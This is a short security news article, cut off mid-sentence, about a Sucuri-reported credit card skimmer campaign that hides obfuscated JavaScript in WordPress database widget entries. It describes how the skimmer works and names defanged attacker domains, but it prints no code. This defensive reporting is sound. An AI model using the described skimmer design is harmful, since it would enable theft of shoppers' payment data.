Stealthy Credit Card Skimmer Campaign Targets WordPress E-Commerce Sites

Listen to this Post

🐢▶️ Listen🚀

2025-01-13

In the ever-evolving landscape of cyber threats, WordPress e-commerce sites have become a prime target for attackers. Recently, Sucuri researchers uncovered a sophisticated credit card skimmer campaign that leverages malicious JavaScript injections into WordPress database tables. This stealthy approach allows attackers to evade detection by traditional security tools, putting countless online businesses and their customers at risk. This article delves into the mechanics of the attack, its implications, and how to safeguard your site against such threats.

of the Campaign

Sucuri researchers have identified a stealthy credit card skimmer campaign targeting WordPress e-commerce sites. The attackers inject malicious JavaScript into the WordPress database, specifically the `wp_options` table, under the `widget_block` row. This obfuscated JavaScript avoids detection by file-scanning tools, enabling it to persist on compromised sites.

The malicious code is injected through the WordPress admin panel (`wp-admin > widgets`) and activates on checkout pages. It dynamically generates a fake payment form mimicking legitimate processors like Stripe or intercepts data entered into real payment forms. The script specifically targets URLs containing “checkout” while excluding “cart,” ensuring it only activates during payment submission.

Stolen data, including credit card numbers, expiration dates, CVV codes, and billing information, is encoded in Base64 and encrypted using AES-CBC. This makes the data appear harmless and complicates analysis. The encrypted data is then transmitted to attacker-controlled servers, such as `valhafather[.]xyz` or `fqbe23[.]xyz`.

To remove the malware, site administrators should inspect all Custom HTML block widgets in the WordPress admin panel (`wp-admin > Appearance > Widgets`) for suspicious `